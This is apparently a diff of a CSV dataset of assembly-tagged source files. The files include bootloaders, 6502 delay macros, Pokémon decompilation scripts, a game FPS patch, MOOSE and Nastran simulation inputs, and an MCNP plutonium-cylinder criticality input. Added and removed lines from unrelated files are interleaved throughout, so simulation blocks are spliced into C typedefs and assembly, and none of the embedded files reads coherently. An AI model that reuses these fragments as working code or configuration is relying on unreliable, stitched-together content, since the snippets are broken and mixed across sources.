+ push wavname + push wavformat + call [__imp__printf] + add esp, byte 2*4 + + push filemode + push wavname + call [__imp__fopen] + add esp, byte 2*4 + + push eax + push eax + push eax + push byte 44 + push byte 1 + push _Oidos_WavFileHeader + call [__imp__fwrite] + add esp, byte 3*4 + + push dword [_Oidos_WavFileHeader+40] + push byte 1 + push _Oidos_MusicBuffer + call [__imp__fwrite] + add esp, byte 3*4 + + call [__imp__fclose] + add esp, byte 1*4 +%endif + + call _Oidos_StartMusic + +.playloop: + mov ebx, 60 + + fild dword [_Oidos_MusicLength] + fdiv dword [_Oidos_TicksPerSecond]","3449","0.7402876153681047","0.0","0.0" +"069eb99cd2fa0743293d83e50ff36bfdd893b01a","rage.asm",".asm","Assembly","BattleCommand_Rage: ; 36f1d +; rage + ld a, BATTLE_VARS_SUBSTATUS4 + call GetBattleVarAddr + set SUBSTATUS_RAGE, [hl] + ret -[Mesh] - type = GeneratedMesh - dim = 2 +; 36f25 +","3449","0.7402876153681047","0.0","0.0" +"0f1f75915f73285ca947ea3d83a557ee25002336","tapu_lele.asm",".asm","Assembly"," dw 00786 ;national dex no + + db 70, 85, 75, 95, 130, 115 + evs 0, 0, 0, 0, 3, 0 + ; hp atk def spd sat sdf + + db PSYCHIC, FAIRY ; type + db 3 ; catch rate + db 257 ; base exp + db NO_ITEM, NO_ITEM ; items + dn GENDERLESS, 3 ; gender, step cycles to hatch + INCBIN ""gfx/pokemon/tapu_lele/front.dimensions"" + db PSYCHIC_SURGE, PSYCHIC_SURGE ; abilities + db TELEPATHY ; hidden ability + db GROWTH_SLOW ; growth rate + dn EGG_NONE, EGG_NONE ; egg groups + + ; tm/hm learnset + tmhm + ; end","3449","0.7402876153681047","0.0","0.0" +"08e06a33fa5570805c692793249391154fe616a5","FPSHack_08_STControl_CheckUpTrigger_LowHz.asm",".asm","Assembly","#To be inserted at 800586a8 +############################################# +##FPSHack_08_STControl_CheckUpTrigger_LowHz## +############################################# - nx = 40 - ny = 80 +lis r17, 0x817F +lwz r17, 0x0000 (r17) #Load LowHzFuncsRunThisFrame into r0 - xmin = 0.002 - xmax = 0.01261566794 +cmpwi r17, 1 #Check if LowHzFuncsRunThisFrame == true -ymin = .0024 - ymax = 25.0e-3 - #uniform_refine = 2 - #elem_type = QUAD9 -# displacements = 'disp_x disp_y' - distribution = serial -[] +##### +beq- 0x000C +##False +li r3, 0 #Return false for trigger +blr +##True +lha r0, 0x0010 (r3) #VANILLA +#####","3449","0.7402876153681047","0.0","0.0" +"09ac6b49591bcb4c9f3526f0bf6e485a29177970","drivers--block--drbd--drbd.ko_047.7407cf3.32_7a.cil_true-unreach-call.i",".i","Assembly","extern void __VERIFIER_error() __attribute__ ((__noreturn__)); + +/* Generated by CIL v. 1.5.1 */ +/* print_CIL_Input is false */ -[Problem] - # Specify coordinate system type - coord_type = RZ +typedef signed char __s8; +typedef unsigned char __u8; +typedef short __s16; +typedef unsigned short __u16; +typedef int __s32; +typedef unsigned int __u32; +typedef long long __s64; +typedef unsigned long long __u64; +typedef unsigned char u8; +typedef unsigned short u16; +typedef int s32; +typedef unsigned int u32; +typedef long long s64; +typedef unsigned long long u64; +typedef unsigned short umode_t; +typedef u64 dma_addr_t; +typedef unsigned int __kernel_mode_t; +typedef unsigned long __kernel_nlink_t; +typedef long __kernel_off_t; +typedef int __kernel_pid_t; +typedef unsigned int __kernel_uid_t; +typedef unsigned int __kernel_gid_t; +typedef unsigned long __kernel_size_t; +typedef long __kernel_ssize_t; +typedef long __kernel_time_t; +typedef long __kernel_clock_t; +typedef int __kernel_timer_t; +typedef int __kernel_clockid_t; +typedef long long __kernel_loff_t; +typedef __kernel","379","0.08134792874007298","0.0","0.0" +"127a53a8ddbeaed4df5bbe8f56f788b70ae3c7e3","nonUniformElemOpenJet.i",".i","Assembly","Simulations: + - name: sim1 + time_integrator: ti_1 + optimizer: opt1 + +linear_solvers: + + - name: solve_scalar + type: tpetra + method: gmres + preconditioner: sgs + tolerance: 1e-5 + max_iterations: 50 + kspace: 50 + output_level: 0 + + - name: solve_cont + type: tpetra + method: gmres + preconditioner: muelu + tolerance: 1e-5 + max_iterations: 50 + kspace: 50 + output_level: 0 + muelu_xml_file_name: ../../xml/matches_ml_default.xml + +realms: + + - name: realm_1 + mesh: ../../mesh/2cm_ped_35K_mks.g + use_edges: no + + equation_systems: + name: theEqSys + max_iterations: 2 + + solver_system_specification: + velocity: solve_scalar + pressure: solve_cont + mass_fraction: solve_scalar + + systems: + + - LowMachEOM: + name: myLowMach + max_iterations: 1 + convergence_tolerance: 1e-5 + + - MassFraction: + name: myYk + max_iterations: 1 + convergence_tole","379","0.08134792874007298","0.0","0.0" +"0a7f85573f41e963415a4a4feff575a5763d03a6","output_residual_test.i",".i","Assembly","[Mesh] + file = sq-2blk.e + uniform_refine = 3 [] [Variables] - active = 'crud_temperature crud_pressure H+ Li+ OH- H3BO3' - - [./crud_temperature] - order = FIRST - family = LAGRANGE - initial_condition = 615.0 - scaling = 1e-3 - [../] - - [./crud_pressure] - order = FIRST - family = LAGRANGE - initial_condition = 15510.0 - scaling = 1e-3 - [../] - - [./Li+] - order = FIRST - family = LAGRANGE - initial_condition = 0.00028571 - [../] + # variable in the whole domain + [./u] + order = FIRST + family = LAGRANGE - [./OH-] - order = FIRST - family = LAGRANGE - initial_condition = 3.8e-5 #mol/kg density=661kg/m^3 water ion product is about -11.6 + [./InitialCondition] + type = ConstantIC + value = 0 + [../] [../] -","375","0.08155719878207916","0.0","0.0" -"1765a0fd48d69eda0a717eac3edbaa11da8534f5","brick1_mu_0_2_kin.i",".i","Assembly","[Mesh] - file = brick1_mesh.e - displacements = 'disp_x disp_y disp_z' -[] - -[Problem] - type = FrictionalContactProblem - master = 4 - slave = 3 - friction_coefficient = 0.20 - slip_factor = 1.0 - slip_too_far_factor = 1.0 - disp_x = disp_x - disp_y = disp_y - disp_z = disp_z - residual_x = saved_x - residual_y = saved_y - residual_z = saved_z - diag_stiff_x = diag_saved_x - diag_stiff_y = diag_saved_y - diag_stiff_z = diag_saved_z - inc_slip_x = inc_slip_x - inc_slip_y = inc_slip_y - inc_slip_z = inc_slip_z - contact_slip_tolerance_factor = 100 - target_relative_contact_residual = 1.e-4 - target_contact_residual = 1.e-4 - maximum_slip_iterations = 50 - minimum_slip_iterations = 1 - slip_updates_per_iteration = 5 - solution_variables = 'disp_x disp_y disp_z' - reference_residual_variables = 'saved_x saved_y saved_z' - contact_reference_residual_variables = 'saved_x saved_y saved_z' -[] - -[Variables] - [./disp_x] + # subdomain restricted variable + [./v] order = FIRST family = LAGRANGE + block = '1' [../] - [./disp_y] - order = FIRS","375","0.08155719878207916","0.0","0.0" -"1ef9a7832422b80c6cf7573d1062897ad59010f5","EnableCache.i",".i","Assembly","# 1 ""/mnt/c/SerranonOS/UEFI/vUDK2017/MdePkg/Library/BaseLib/X64/EnableCache.nasm"" -# 1 """" -# 1 """" -# 1 ""/usr/include/stdc-predef.h"" 1 3 4 -# 1 """" 2 -# 1 ""/mnt/c/SerranonOS/UEFI/vUDK2017/Build/DuetPkgX64/DEBUG_GCC5/X64/MdePkg/Library/BaseLib/BaseLib/DEBUG/AutoGen.h"" 1 -# 16 ""/mnt/c/SerranonOS/UEFI/vUDK2017/Build/DuetPkgX64/DEBUG_GCC5/X64/MdePkg/Library/BaseLib/BaseLib/DEBUG/AutoGen.h"" -# 1 ""/mnt/c/SerranonOS/UEFI/vUDK2017/MdePkg/Include/Base.h"" 1 -# 28 ""/mnt/c/SerranonOS/UEFI/vUDK2017/MdePkg/Include/Base.h"" -# 1 ""/mnt/c/SerranonOS/UEFI/vUDK2017/MdePkg/Include/X64/ProcessorBind.h"" 1 -# 188 ""/mnt/c/SerranonOS/UEFI/vUDK2017/MdePkg/Include/X64/ProcessorBind.h"" - typedef unsigned long long UINT64; - - - - typedef long long INT64; - - - - typedef unsigned int UINT32; - - - - typedef int INT32; - - - - typedef unsigned short UINT16; - - - - - typedef unsigned short CHAR16; - - +[] - typedef short INT16; +[Functions] + [./forcing_fn] + type = ParsedFunction + # dudt = 3*t^2*(x^2 + y^2) + value = 3*t*t*((x*x)+(y*y))-(4*t*t*t) + [../] + [./exact_fn] + type = ParsedFunction + value = t*t*t*((x*x)+(y*y)) + [../] + [./exact_fn_v] + type = ParsedFunction + value = t+1 + [../] +[] +[Kernels] + [./ie_u] + type = TimeDerivative + variable = u + [../] - typedef unsigned char BOOLEAN; + [./diff_u] + type = Diffusion + variable = u + [../] + [./ffn_u] + type = UserForcingFunction + variable = u + function = forcing_fn + [../] - typedef unsigned char UINT8; + [./ie_v] + type = TimeDerivative + variable = v + [../] + [./diff_v] + type = Diffusion + variable = v + [../] +[] - typedef ","375","0.08155719878207916","0.0","0.0" -"006b8d58d6f7138c7a8de734845e25ed1cec1b6f","Ex2-4.i",".i","Assembly","Title Here (1 line) -c Cell Cards -c Cylinder -1 1 -15 -1 2 -3 imp:n=1$ Pu cylinder -2 2 -18.8 1 2 -3 -4 imp:n=1 $ Radial U reflector -c Universe -999 0 4:-2:3 imp:n=0 $ Void Universe +[BCs] + [./all_","379","0.08134792874007298","0.0","0.0" +"05358e8cd933a70a780359b14387af155d6429dc","drivers--net--can--usb--ems_usb.ko_004.d0e1e88.08_1a.cil_true-unreach-call.i",".i","Assembly","extern void abort(void); +void reach_error(){} -c Blank Line -c Pu Cylinder -1 cx 4.935 $ Pu cylinder -2 px 0 $ Bottom of cylinder -3 px 6.909 $ Top of cylinder -c Reflector -4 cx 9.935 $ Radial U reflector +/* Generated by CIL v. 1.5.1 */ +/* print_CIL_Input is false */ -c Blank Line -c Data Cards -c Criticality Control Cards -kcode 5000 1 50 250 $ This is a k_eff estimation calculation card -c Source Cards -ksrc 3.5 0 0 $ 1 point source @ (0,0,8.6) -c Material Cards -m1 94239.66c 1 $ Pu Cylinder Material -m2 92238.66c 0.992745 92235.66c 0.0072 $ U Reflector","375","0.08155719878207916","0.0","0.0" -"062a69b593a6c0c1d9ba51fac5229f059d641cd3","6502-inline_delay-keepxcd-w200-ptr-a27-Ba16-stack.inc",".inc","Assembly","; delay_n, delays n cycles with small code -; Will clobber A, Y, S, Z+N, and V -; Will preserve X, C, D, and I (interrupt-disable flag) +typedef signed char __s8; +typedef unsigned char __u8; +typedef short __s16; +typedef unsigned short __u16; +typedef int __s32; +typedef unsigned int __u32; +typedef long long __s64; +typedef unsigned long long __u64; +typedef unsigned char u8; +typedef unsigned short u16; +typedef int s32; +typedef unsigned int u32; +typedef long long s64; +typedef unsigned long long u64; +typedef unsigned short umode_t; +typedef u64 dma_addr_t; +typedef unsigned int __kernel_mode_t; +typedef unsigned long __kernel_nlink_t; +typedef long __kernel_off_t; +typedef int __kernel_pid_t; +typedef unsigned int __kernel_uid_t; +typedef unsigned int __kernel_gid_t; +typedef unsigned long __kernel_size_t; +typedef long __kernel_ssize_t; +typedef long __kernel_time_t; +typedef long __kernel_clock_t; +typedef int __kernel_timer_t; +typedef int __kernel_clockid_t; +typedef long long __kernel_loff_t; +typedef __kernel_uid_t __kernel_","379","0.08134792874007298","0.0","0.0" +"12d47a9c06e6f4d919a3b17595e021a243dcc96b","armoct01.i",".i","Assembly","/* GUI CONVERTED from armoct01.i (converter v1.75) Sun Aug 13 21:19:26 2000 */ +/* armoct01.i - AR MEMO PRINT HEADER FOR CANDIAN TAXES */ +/* Copyright 1986-2000 QAD Inc., Carpinteria, CA, USA. */ +/* All rights reserved worldwide. This is an unpublished work. */ +/*F0PN*/ /*V8:ConvertMode=Report */ +/*K1Q4*/ /*V8:RunMode=Character,Windows */ +/* REVISION: 7.4 LAST MODIFIED: 09/17/93 BY: JJS *H158* */ +/* REVISION: 8.6 LAST MODIFIED: 02/18/97 BY: *K06Z* M. Madison */ +/* REVISION: 8.6 LAST MODIFIED: 04/09/97 BY: *J1NK* R. McCarthy */ + + +/* REVISION: 8.6E LAST MODIFIED: 02/23/98 BY: *L007* A. Rahane */ +/* REVISION: 8.6E LAST MODIFIED: 05/20/98 BY: *K1Q4* Alfred Tan */ +/* REVISION: 8.6E LAST MODIFIED: 10/04/98 BY: *J314* Alfred Tan */ +/* REVISION: 9.0 LAST MODIFIED: 03/10/99 BY: *M0B3* Michael Amaladhas */ +/*","379","0.08134792874007298","0.0","0.0" +"01d6f24f1c159290f26543b6621cb58e34309f53","6502-inline_delay-keepaxcd-w200-a25-rti.inc",".inc","Assembly","; delay_n, delays n cycles with small code +; Will clobber Y, Z+N, and V +; Will preserve A, X, S, C, D, and I (interrupt-disable flag) ; -; WARNING: THIS VERSION CLOBBERS THE STACK POINTER. +; Requires a dummy interrupt handler that does nothing but RTI. ; ; Requires that a label @nearby_rts is defined, ; that points _somewhere_ that contains a $60 byte (RTS). @@ -6401,120 +6685,149 @@ m2 92238.66c 0.992745 92235.66c 0.0072 $ U Reflector","375","0.08155719878207916 ; ; Requires that a label @nearby_rts_15cyc is defined, ; that points _somewhere_ that contains a JMP to a location that does RTS. - -; Requires a zeropage two-byte variable @ptrtemp, that points -; into a memory address that can be safely read and overwritten -; with random data. ; -; Requires a function called ""delay_256a_16_clocks_b"" +; Requires a function called ""delay_a_25_clocks"" ; that is defined as follows: ;;;;;;;;;;;;;;;;;;;;;;;;; -;; Delays A*256 clocks + overhead +;; Delays A clocks + overhead ;; Clobbers A. Preserves X,Y. -;; Time: A*256+16 clocks (including JSR) -;; Depends on delay_a_27_clocks -;;","938","0.20400173988690734","0.0","0.0" -"0025eab2a074e9343d51e2a33fc9504f1f2be32a","scripts.inc",".inc","Assembly"," - .macro SootopolisCity_GotoIfNoWeather pointer:req - compare VAR_SKY_PILLAR_STATE, 2 - goto_if_ge \pointer - goto_if_unset FLAG_KYOGRE_ESCAPED_SEAFLOOR_CAVERN, \pointer - .endm - -@ ----------------------------------------------------- - -SootopolisCity_PokemonCenter_1F_MapScripts:: @ 82264F1 - map_script MAP_SCRIPT_ON_LOAD, SootopolisCity_PokemonCenter_1F_OnLoad - map_script MAP_SCRIPT_ON_TRANSITION, SootopolisCity_PokemonCenter_1F_OnTransition - map_script MAP_SCRIPT_ON_RESUME, SootopolisCity_PokemonCenter_1F_MapScript1_277C30 - @ map_script MAP_SCRIPT_ON_FRAME_TABLE, SootopolisCity_PokemonCenter_1F_FrameTable - .byte 0 - -SootopolisCity_PokemonCenter_1F_OnTransition: @ 82264FC - setrespawn HEAL_LOCATION_SOOTOPOLIS_CITY - goto_if_set FLAG_HIDE_SOOTOPOLIS_CITY_RESIDENTS, Common_EventScript_NopEnd - setweather_nodelay WEATHER_POWEROUT - setmaplayoutindex LAYOUT_SOOTOPOLIS_CITY_POKEMON_CENTER_ALT - @ Move people around - setobjectxyperm 4, 6, 9 - setobjectmovementtype 4, MOVEMENT_TYPE_FACE_LEFT - setobjectxy","938","0.20400173988690734","0.0","0.0" -"186a3df60beac935d5f6c467c1d6b5f04adbb1e2","linux.xl.inc",".inc","Assembly","# Copyright (c) 2005-2017 Intel Corporation -# -# Licensed under the Apache License, Version 2.0 (the ""License""); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an ""AS IS"" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -# -# -# - -####### Detections and Commands ############################################### - -COMPILE_ONLY = -c -PREPROC_ONLY = -E -qsourcetype=c -INCLUDE_KEY = -I -DEFINE_KEY = -D -OUTPUT_KEY = -o # -OUTPUTOBJ_KEY = -o # -PIC_KEY = -qpic -WARNING_AS_ERROR_KEY = -qhalt=w -WARNING_KEY = -TEST_WARNING_KEY = - -WARNING_SUPPRESS = -DYLIB_KEY = -qmkshrobj -EXPORT_KEY = -Wl,--version-script, -LIBDL = -ldl - -CPLUS = xlc++_r -CONLY = ","938","0.20400173988690734","0.0","0.0" -"1f41425965e77dd6334be51f59ba503689a6e17a","6502-inline_delay-keepaxy-nobranch-ram-a27-ax33.inc",".inc","Assembly","6502-inline_delay-keepaxyd-nobranch-ram-a27-ax33.inc","938","0.20400173988690734","0.0","0.0" -"03f8c37a579c5cc04fc0ce7c9a40c5f71111f17b","scripts.inc",".inc","Assembly","Route101_MapScripts:: @ 81EBCBA - map_script MAP_SCRIPT_ON_TRANSITION, Route101_OnTransition - map_script MAP_SCRIPT_ON_FRAME_TABLE, Route101_OnFrame - .byte 0 - -Route101_OnTransition: @ 81EBCC5 - call ProfBirch_EventScript_UpdateLocation - end - -Route101_OnFrame: @ 81EBCCB - map_script_2 VAR_ROUTE101_STATE, 0, Route101_EventScript_HideMapNamePopup - .2byte 0 - -Route101_EventScript_HideMapNamePopup:: @ 81EBCD5 - setflag FLAG_HIDE_MAP_NAME_POPUP - setvar VAR_ROUTE101_STATE, 1 - end - -Route101_EventScript_StartBirchRescue:: @ 81EBCDE - lockall - playbgm MUS_EVENT0, 1 - msgbox Route101_Text_HelpMe, MSGBOX_DEFAULT - closemessage - setobjectxy 2, 0, 15 - setobjectxy 4, 0, 16 - applymovement EVENT_OBJ_ID_PLAYER, Route101_Movement_EnterScene - applymovement 2, Route101_Movement_BirchRunAway1 - applymovement 4, Route101_Movement_PoochyenaChase1 - waitmovement 0 - applymovement 4, Route101_Movement_PoochyenaChaseInCircles - applymovement 2, Route101_Movement_BirchRunInCircles - waitmovement 0 - applymovement 2, Common_Mov","938","0.20400173988690734","0.0","0.0" -"00d4204cbfdf15f814e0b4cdd8bfb8d901afb600","Unit2d_16.nas",".nas","Assembly","ID C:\Users\Dima\Lame3d2\Mpl,FEMAP -SOL SESTATICS -TIME 10000 -CEND +;; Time: A+25 clocks (including JSR) +;;;;;;;;;;;;;;;;;;;;;;;;; +; ; Cycles Accumulator Carry flag +; ; 0 1 2 3 4 5 6 (hex) 0 1 2 3 4 5 ","971","0.2084138227087358","0.0","0.0" +"0db3b80d03e51bcf1b4dfb0efb3bf3186be4fbf3","6502-inline_delay-keepaxycd-a25-rti-unsafe-nofc-rts15.inc",".inc","Assembly","6502-inline_delay-keepaxycd-a25-rti-nofc-rts15.inc","971","0.2084138227087358","0.0","0.0" +"0194406088920f45ff9ed4cc0bd83dc86ca75f04","6502-inline_delay-keepaczndv-a25-xa30-relocatable-rts15.inc",".inc","Assembly","; delay_n, delays n cycles with small code +; Will clobber X, and Y +; Will preserve A, S, and P +; +; Requires that a label @nearby_rts is defined, +; that points _somewhere_ that contains a $60 byte (RTS). +; +; Requires that a label @nearby_rts_15cyc is defined, +; that points _somewhere_ that contains a JMP to a location that does RTS. +; +; Requires a function called ""delay_256x_a_30_clocks"" +; that is defined as follows: +;;;;;;;;;;;;;;;;;;;;;;;;; +;; Delays X*256 clocks + overhead +;; Clobbers A,X. Preserves Y. +;; Depends on delay_a_25_clocks within short branch distance +;; Time: X*256+16 clocks (including JSR) +;;;;;;;;;;;;;;;;;;;;;;;;; +;delay_256x_a_30_clocks: +; cpx #0 +; beq delay_a_25_clocks +; ;4 cycles done. Loop is 256 cycles +;: pha +; lda #(256-7-2-2-3) +; jsr delay_a_25_clocks +; pla +; dex +; beq delay_a_25_clocks ; count as 2 +; bne :- +; ;Loop end is -1+1 = 0 cycles. Total: 4+JSR+RTS = 16 +; +; Requires a function called ""delay_a_25_clocks"" +; that is defined as follows: +;;;;;;;;;;;;;;","971","0.2084138227087358","0.0","0.0" +"033de09218b3aa27defc04425be0f8c8de393b9c","account_offset_type.inc",".inc","Assembly","[% SWITCH account_offset.type %] + [% CASE 'Credit Applied' %]Credit applied + [% CASE 'Payment' %]Payment + [% CASE 'Manual Credit' %]Manual credit + [% CASE 'Manual Debit' %]Manual invoice + [% CASE 'Lost Item Return' %]Lost item returned + [% CASE 'Writeoff' %]Writeoff + [% CASE 'Void Payment' %]Void payment + [% CASE %][% account_offset.type %] +[%- END -%] +","971","0.2084138227087358","0.0","0.0" +"08c07d391373c716835c947fd5b37e8d0633301d","6502-inline_delay-keepxv-a27-ax33-nofc-relocatable-norts.inc",".inc","Assembly","6502-inline_delay-keepxv-a27-ax33-nofc-norts.inc","971","0.2084138227087358","0.0","0.0" +"0e9055c49aa709616e9db0ff6d73b96c320cc463","ipl.nas",".nas","Assembly","; haribote-ipl +; TAB=4 + +CYLS EQU 10 ; どこまで読み込むか + + ORG 0x7c00 ; このプログラムがどこによみこまれるのか + +; 以下は標準的なFAT12フォーマットフロッピーディスクのための記述 + + JMP entry + DB 0x90 + DB ""HARIBOTE"" ; ブートセクタの名前を自由に書いてよい（8バイト） + DW 512 ; 1セクタの大きさ（512にしなければいけない） + DB 1 ; クラスタの大きさ（1セクタにしなければいけない） + DW 1 ; FATがどこから始まるか（普通は1セクタ目からにする） + DB 2 ; FATの個数（2にしなければいけない） + DW 224 ; ルートディレクトリ領域の大きさ（普通は224エントリにする） + DW 2880 ; このドライブの大きさ（2880セクタにしなければいけない） + DB 0xf0 ; メディアのタイプ（0xf0にしなければいけない） + DW 9 ; FAT領域の長さ（9セクタにしなければいけない） + DW 18 ; 1トラックにいくつのセクタがあるか（18にしなければいけない） + DW 2 ; ヘッドの数（2にしなければいけない） + DD 0 ; パーティションを使ってないのでここは必ず0 + DD 2880 ; このドライブ大きさをもう一度書く + DB 0,0,0x29 ; よくわからないけどこの値にしておくといいらしい + DD 0xffffffff ; たぶんボリュームシリアル番号 + DB ""HARIBOTEOS "" ; ディスクの名前（11バイト） + DB ""FAT12 "" ; フォーマットの名前（8バイト） + RESB 18 ; とりあえず18バイトあけておく + +; プログラム本体 + +entry: + MOV AX,0 ; レジスタ初期化 + MOV SS,AX + MOV SP,0x7c00 + MOV DS,AX + +;ディスクを読む + MOV AX,0x0820 + M","31","0.006653788366602275","0.0","0.0" +"0c844b102d9abecd3985959a6081c37542d4c632","wcsncpy.nas",".nas","Assembly","; Software License Agreement +; +; Copyright(C) 1994-2022 David Lindauer, (LADSoft) +; +; This file is part of the Orange C Compiler package. +; +; The Orange C Compiler package is free software: you can redistribute it and/or modify +; it under the terms of the GNU General Public License as published by +; the Free Software Foundation, either version 3 of the License, or +; (at your option) any later version. +; +; The Orange C Compiler package is distributed in the hope that it will be useful, +; but WITHOUT ANY WARRANTY; without even the implied warranty of +; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +; GNU General Public License for more details. +; +; You should have received a copy of the GNU General Public License +; along with Orange C. If not, see . +; +; As a special exception, if other files instantiate templates or +; use macros or inline functions from this file, or you compile +; ","31","0.006653788366602275","0.0","0.0" +"0ceb4e3ebc8bae100e57d3caf3dda0d6a90f76ce","api004.nas",".nas","Assembly","; api004.nas,系统调用号为4的系统调用-结束应用程序 + +; ��� api001.nas +[FORMAT ""WCOFF""] +[INSTRSET ""i486p""] +[BITS 32] +[FILE ""api004.nas""] + + GLOBAL _api_end + +[SECTION .text] +; 同 api001.nas + +; _api_end, +; 退出应用程序 +_api_end: ; void api_end(void); + MOV EDX,4 ; EDX=系统调用号,见 hrb_api() + INT 0x40 ; 进入内核执行 _asm_hrb_api,见 init_gdtidt() + ; _asm_hrb_api 执行EDX=4的子程序后将调用 _asm_end_app 结束引用程序","31","0.006653788366602275","0.0","0.0" +"081e1377fb5def88928b8dcf2794cb5a0eaf907e","sph285_02a.nas",".nas","Assembly","ID c:\Users\Dima\Lame3d2\IDE,FEMAP +SOL SESTATICS +TIME 10000 +CEND ECHO = NONE DISPLACEMENT(PLOT) = ALL SPCFORCE(PLOT) = ALL @@ -6526,8 +6839,8 @@ $ *************************************************************************** $ Written by : FEMAP $ Version : 7.00 $ Translator : MSC/NASTRAN -$ From Model : C:\Users\Dima\Lame3d2\Mpls_all\Exe\Parametric\Solid\UnitBox.MOD -$ Date : Mon Oct 10 15:28:47 2005 +$ From Model : c:\Users\Dima\Lame3d2\IDENT_17may2006\Ident\Exe\box2d_fulleren\Solid\model.MOD +$ Date : Mon May 22 14:35:35 2006 $ *************************************************************************** $ PARAM,POST,-1 @@ -6538,652 +6851,649 @@ CORD2C 1 0 0. 0. 0. 0. 0. 1.+FEMAPC1 +FEMAPC1 1. 0. 1. CORD2S 2 0 0. 0. 0. 0. 0. 1.+FEMAPC2 +FEMAPC2 1. 0. 1. -$ FEMAP Property 1 : UnitPlane -PSHELL 1 1 0. 1 1 0. -$ FEMAP","29","0.006307090039147456","0.0","0.0" -"1374640758ccc6bb881df66c16379fcaf8b109e2","LT0015R.20100401000000.20110610000000.smps.particle_number_size_distribution.aerosol.18d.1h.LT01L_SMPS_Preila.LT01L_smps_SMPS_Preila_2010.lev2.nas",".nas","Assembly","474 1001 -Ulevicius, Vidmantas -LT01L, ""Institute of Physics, Aerosol Research Laboratory"", , , ""A. Gostauto Str. 12, 2600 Vilnius, Lithuania"", , , , -Ulevicius, Vidmantas -EMEP EUSAAR GAW-WDCA -1 1 -2010 01 01 2011 06 10 -0.041667 -days from file reference point -433 -1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1","29","0.006307090039147456","0.0","0.0" -"0230ecbd0da1b098f7a57832f13b7a45fa7f28f5","ipl10.nas",".nas","Assembly","; haribote-ipl +$ FEMAP Load Set 111 : Inclusion BSOURCE 0.3945 0.3945 0.285 0.285 0. +$ FEMAP Property 1 : Matrix","31","0.006653788366602275","0.0","0.0" +"0885e240828d2aff419214b46e641f6d69642397","haribote.nas",".nas","Assembly","; haribote-os ; TAB=4 - ORG 0x7c00 - - JMP short entry - nop - DB 'MSDOS5.0' ;""HARIBOTE"" - DW 512 - DB 8 - DW 36 - DB 2 - DW 0 - DW 0 - db 0xf8 - dw 0 - dw 63 - dw 255 - dd 1 - dd 15727634 - dd 15330 - dw 0 - dw 0 - dd 2 - dw 1 - dw 6 - times 12 db 0 - db 80h - db 0 - db 29h - dd 18467 - DB ""NO NAME "" - DB ""FAT32 "" -entry: - MOV AX,0 - MOV SS,AX - MOV ES, AX - MOV SP,0x7c00 - MOV DS,AX - - MOV AX,0x0820 - MOV ES,AX - MOV CH,1 - MOV DH,232 - MOV CL,17 - MOV [0x7dfe], DL -readloop: - MOV SI,0 -retry: - MOV AH,0x02 - MOV AL,1 - MOV BX,0 - MOV DL,[0x7dfe] - INT 0x13 - JNC next - ADD SI,1 - CMP SI,5 - JAE error - MOV AH,0x00 - MOV DL,0x00 - INT 0x13 - JMP retry -next: - MOV AX,ES - ADD AX,0x0020 - MOV ES,AX - ADD CL,1 - CMP CL,63 - JBE readloop - - MOV CL, 1 - ADD DH, 1 - CMP DH, 6 - JB readloop - - push ds - mov ax, 0x820 - mov ds, ax - mov bx, 0x0 - mov d","29","0.006307090039147456","0.0","0.0" -"182a62cd4c3df6e054666ca649955a05dac8e61d","bootpack.nas",".nas","Assembly","[FORMAT ""WCOFF""] -[INSTRSET ""i486p""] -[OPTIMIZE 1] -[OPTION 1] -[BITS 32] - EXTERN _init_gdtidt - EXTERN _init_pic - EXTERN _io_sti - EXTERN _fifo32_init - EXTERN _init_pid - EXTERN _io_out8 - EXTERN _init_keyboard - EXTERN _enable_mouse - EXTERN _memtest - EXTERN _memman_init - EXTERN _memman_free - EXTERN _timer_alloc - EXTERN _timer_init - EXTERN _timer_settime - EXTERN _init_palette - EXTERN _shtctl_init - EXTERN _sheet_alloc - EXTERN _memman_alloc_4k - EXTERN _sheet_setbuf - EXTERN _init_screen8 - EXTERN _sprintf - EXTERN _putfonts8_asc_sht - EXTERN _memman_total - EXTERN _sheet_slide - EXTERN _sheet_updown - EXTERN _init_mouse_cursor8 - EXTERN _make_window8 - EXTERN _sheet_refresh - EXTERN _io_cli - EXTERN _timerctl - EXTERN _fifo8_status - EXTERN _fifo32_get - EXTERN _boxfill8 - EXTERN _mouse_decode - EXTERN _key_table.0 -[FILE ""bootpack.c""] -[SECTION .data] -_key_table.0: - DB 0 - DB 0 - DB 49 - DB 50 - DB 51 - DB 52 - DB 53 - DB 54 - DB 55 - DB 56 - DB 57 - DB 48 - DB 45 - DB ","29","0.006307090039147456","0.0","0.0" -"138422f0324ee580de082c94a5f1b65f2563f30e","hello.nas",".nas","Assembly","; hello-os -; TAB = 4 - -; 以下这段是标准FAT12格式软盘专用的代码 - - DB 0xEB, 0x4E, 0x90 - DB ""HelloIPL"" ; 启动区的名称可以是任意的字符串 - DW 512 ; 